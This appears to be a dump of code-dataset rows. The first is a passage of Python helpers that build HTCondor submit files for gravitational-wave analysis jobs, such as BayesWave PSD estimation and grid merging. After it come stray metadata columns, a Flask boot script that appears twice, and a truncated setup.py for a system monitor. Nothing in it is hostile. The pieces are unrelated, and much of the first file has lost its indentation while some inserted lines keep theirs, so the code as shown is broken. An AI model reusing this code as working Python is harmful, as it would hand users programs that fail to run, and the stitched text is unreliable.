Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
    ile_job.add_opt(arg_str,'') # add_opt() writes its own leading '--', so the already-stripped option string is passed as the key with an empty value
    # ile_job.add_opt(arg_str[2:],'') # equivalent variant that strips the leading '--' by hand
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
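# A minimal usage sketch: the grid-initialization job must finish before any job
# that reads the grid it writes, so in a DAG it becomes the parent of the first
# iteration's worker nodes.  The argument string and log directory are placeholders.
def _sketch_grid_init_parent(ile_nodes):
    """Sketch: make every node in ile_nodes depend on a grid-init node."""
    init_job, init_sub = write_init_sub(tag='gridinit',
                                        arg_str='--grid-cartesian-npts 1000',
                                        log_dir='logs/')
    init_node = pipeline.CondorDAGNode(init_job)
    for node in ile_nodes:
        node.add_parent(init_node)
    return init_node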
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
        sys.exit(1)   # hard failure: exit non-zero so callers can detect it
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
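# A minimal usage sketch: the job above expects all detector-specific options in a
# single macro argument ($(macroargument0)), so each detector gets its own node.
# With glue.pipeline, add_var_arg() fills macroargument0 and add_macro() fills the
# $(ifo) and $(macroevent) macros used above.  Channel names, cache file and the
# event id are placeholders.
def _sketch_bw_monoblock_nodes(dag, event_time):
    """Sketch: one BayesWave node per detector."""
    bw_job, bw_sub = write_psd_sub_BW_monoblock(tag='BW_mono', log_dir='logs/',
                                                event_time=event_time, psd_length=4)
    for ifo, channel in [('H1', 'GDS-CALIB_STRAIN'), ('L1', 'GDS-CALIB_STRAIN')]:
        node = pipeline.CondorDAGNode(bw_job)
        node.add_var_arg("--ifo {0} --{0}-channel {0}:{1} --{0}-cache local.cache".format(ifo, channel))
        node.add_macro("ifo", ifo)            # fills the $(ifo) in outputDir above
        node.add_macro("macroevent", 0)       # fills the $(macroevent) in the log-file names
        dag.add_node(node)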
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
    Write a submit file for the BayesWavePost stage of BayesWave-based PSD construction (post-processing of the initial BayesWave run).
    Inputs:
        - channel_dict['H1'] = [channel_name, flow_ifo]
    Outputs:
        - An instance of the CondorDAGJob that was generated for BayesWavePost
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
        sys.exit(1)   # hard failure: exit non-zero so callers can detect it
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
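# A minimal usage sketch of the channel_dict layout the docstring describes: one
# entry per detector, value = [channel name without the ifo prefix, low-frequency
# cutoff].  The channel name, cutoff, cache file and tag are placeholders.
def _sketch_bw_post_job(event_time):
    """Sketch: build the BayesWavePost job for two detectors."""
    channel_dict = {'H1': ['GDS-CALIB_STRAIN', 20],
                    'L1': ['GDS-CALIB_STRAIN', 20]}
    return write_psd_sub_BW_step1(tag='BW_post', log_dir='logs/',
                                  cache_file='local.cache',
                                  channel_dict=channel_dict,
                                  event_time=event_time, psd_length=4)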
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
    Write a submit file for the initial BayesWave run used to construct the PSD.
    Inputs:
        - channel_dict['H1'] = [channel_name, flow_ifo]
    Outputs:
        - An instance of the CondorDAGJob that was generated for BayesWave
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
        sys.exit(1)   # hard failure: exit non-zero so callers can detect it
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
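# A minimal usage sketch: the raw BayesWave run (step 0) must finish before the
# BayesWavePost job (step 1) that post-processes its output, so the two nodes are
# chained with add_parent().  The cache file, tags and event macro are placeholders.
def _sketch_bw_psd_chain(dag, event_time, channel_dict):
    """Sketch: BayesWave followed by BayesWavePost for one event."""
    bw_job, _ = write_psd_sub_BW_step0(tag='BW', log_dir='logs/',
                                       cache_file='local.cache',
                                       channel_dict=channel_dict,
                                       event_time=event_time)
    post_job, _ = write_psd_sub_BW_step1(tag='BW_post', log_dir='logs/',
                                         cache_file='local.cache',
                                         channel_dict=channel_dict,
                                         event_time=event_time)
    bw_node = pipeline.CondorDAGNode(bw_job)
    post_node = pipeline.CondorDAGNode(post_job)
    for node in (bw_node, post_node):
        node.add_macro("macroevent", 0)
        dag.add_node(node)
    post_node.add_parent(bw_node)
    return post_node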
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
        ile_job.add_opt(arg_str,'') # add_opt() writes its own leading '--', so the already-stripped option string is passed as the key with an empty value
        # ile_job.add_opt(arg_str[2:],'') # equivalent variant that strips the leading '--' by hand
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
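# A minimal usage sketch: resample one iteration's combined ILE output into the
# flat samples file used downstream.  Both file names are placeholders.
def _sketch_resample_job():
    """Sketch: build the resample job for one composite file."""
    return write_resample_sub(tag='resample',
                              file_input='extrinsic_posterior_samples.dat',
                              file_output='posterior_samples.dat',
                              log_dir='logs/')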
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
    Write a submit file for a 'cat' job that concatenates the per-worker output files
    into a single composite file (via find/cat/sort/uniq plus a header fix-up)
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
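# The generated catjob.sh is equivalent to running
#   find . -name '<prefix>*<postfix>' -exec cat {} \; | sort -r | uniq > <output>
# followed by a switcheroo pass that turns the leading "m1 ..." column line into a
# "# m1 ..." comment header.  A minimal usage sketch (prefix, postfix and output
# name are placeholders):
def _sketch_cat_job():
    """Sketch: merge all per-worker output files into one composite file."""
    return write_cat_sub(tag='cat',
                         file_prefix='CME-',
                         file_postfix='.composite',
                         file_output='all.composite',
                         log_dir='logs/')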
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
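# A minimal usage sketch: one conversion job per detector, copying the converted
# XML PSD into the run directory via the +PostCmd above.  The paths are placeholders.
def _sketch_convert_psd_jobs(dag, run_dir):
    """Sketch: psd_ascii maps ifo -> ASCII PSD path."""
    psd_ascii = {'H1': 'H1-psd.txt', 'L1': 'L1-psd.txt'}
    for ifo, path in psd_ascii.items():
        job, _ = write_convertpsd_sub(tag='convert_psd_' + ifo, ifo=ifo,
                                      file_input=path, target_dir=run_dir,
                                      log_dir='logs/')
        dag.add_node(pipeline.CondorDAGNode(job))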
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
    Write a submit file that merges the per-worker grid XML files of one iteration into a single grid (via ligolw_add).
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
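# A minimal usage sketch: merge the exploded per-worker grids of one iteration back
# into a single XML grid.  Note the helper assumes log_dir sits directly under the
# run directory (see the working_dir comment above); the names and n_explode are
# placeholders and must match what was actually written.
def _sketch_join_grids_job():
    """Sketch: join 8 exploded grid files into rundir/overlap-grid-0.xml.gz."""
    return write_joingrids_sub(tag='join_grids',
                               target_dir='rundir',
                               output_base='overlap-grid-0',
                               log_dir='rundir/logs/',
                               n_explode=8)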
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
    Write a submit file for the helper that builds the per-iteration ILE sub-DAG from the sim XML and an existing ILE submit file.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
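# A minimal usage sketch: build the helper job that expands an existing ILE.sub into
# a per-iteration sub-DAG, driven by the $(macroiteration) macro.  The directory,
# suffix and sim XML names are placeholders.
def _sketch_subdag_ile_job():
    """Sketch: job that writes the ILE sub-DAG for each iteration."""
    return write_subdagILE_sub(tag='subdag_ile',
                               submit_file='ILE.sub',
                               target_dir='rundir',
                               output_suffix='.composite',
                               sim_xml='rundir/overlap-grid-0.xml.gz',
                               log_dir='rundir/logs/')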
| 423
| 0
| 68
|
175a3b4d2739554618c982905727d9731a509a3f
| 934
|
py
|
Python
|
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# Define the web application container (and keep JSON responses from being forced into ASCII)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# Handle the automatic wiring inside each module and register every blueprint
# dir_path is the blueprint package path; e.g. if the blueprints live in the routes folder, pass '/routes'
print('加载数据库模块')
mysql.pool = Pool.Pool()
# print('Loading finished')
print('蓝图初始化')
for path in properties.blueprint_path:
map_apps(path)
| 22.780488
| 96
| 0.639186
|
# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# Define the web application container (and keep JSON responses from being forced into ASCII)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# Handle the automatic wiring inside each module and register every blueprint
# dir_path is the blueprint package path; e.g. if the blueprints live in the routes folder, pass '/routes'
def map_apps(dir_path):
path=os.getcwd()+dir_path
list=os.listdir(path)
print('蓝图文件夹:','.',dir_path)
# list.remove('__pycache__')
while list:
try:
file=list.pop(0)
if file.startswith('__') and file.endswith('__'):
continue
print('加载蓝图模块:',file)
f_model=__import__(re.sub('/','',dir_path)+'.'+re.sub('\.py','',file),fromlist=True)
app.register_blueprint(f_model.app)
except:
pass
def get_app():
return app
print('加载数据库模块')
mysql.pool = Pool.Pool()
# print('Loading finished')
print('蓝图初始化')
for path in properties.blueprint_path:
map_apps(path)
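# A minimal sketch of the project layout the loader above assumes: properties.py
# exposes blueprint_path, and every module under the blueprint folder exposes a
# Flask Blueprint named `app`.  The module and route names below are made up.
#
# properties.py:
#     blueprint_path = ['/routes']
#
# routes/users.py:
#     from flask import Blueprint
#     app = Blueprint('users', __name__)
#
#     @app.route('/users/ping')
#     def ping():
#         return 'pong'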
| 512
| 0
| 45
|
84eea4a37f53204b935d3f1eece7e1963b816b5c
| 1,893
|
py
|
Python
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | 1
|
2021-05-20T09:31:26.000Z
|
2021-05-20T09:31:26.000Z
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='neerajjangra4u@gmail.com',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
